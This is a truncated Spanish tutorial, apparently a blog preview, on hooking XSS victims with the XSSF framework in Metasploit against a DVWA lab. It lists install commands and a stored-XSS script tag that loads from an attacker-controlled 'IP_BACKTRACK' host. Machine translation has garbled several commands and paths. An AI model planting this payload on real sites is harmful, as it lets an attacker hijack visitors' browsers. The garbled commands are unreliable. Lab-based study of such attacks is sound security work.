Member-only story
En el próximo post vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “gestionar” víctimas XSS genéricas y realizar ataques posteriores, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del marco aquí.
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA, un framework para probar vulnerabilidades web, instalado en una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el framework XSSF desde aquí y descomprimirlo en nuestro directorio metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit
cd / opt / metasploit / msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
descomprime XSSF.zip
cd XSSF
cp -r data / lib / module / plugins / ../# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF
Ahora vamos a DVWA, a la pestaña XSS almacenado, con el DVWA Security en “Bajo” e insertamos el siguiente XSS:
<script src=”http://IP_BACKTRACK:8888/bucle? intervalo = 5”> </script>Si todo funcionó bien, nuestro nombre y el comentario en…
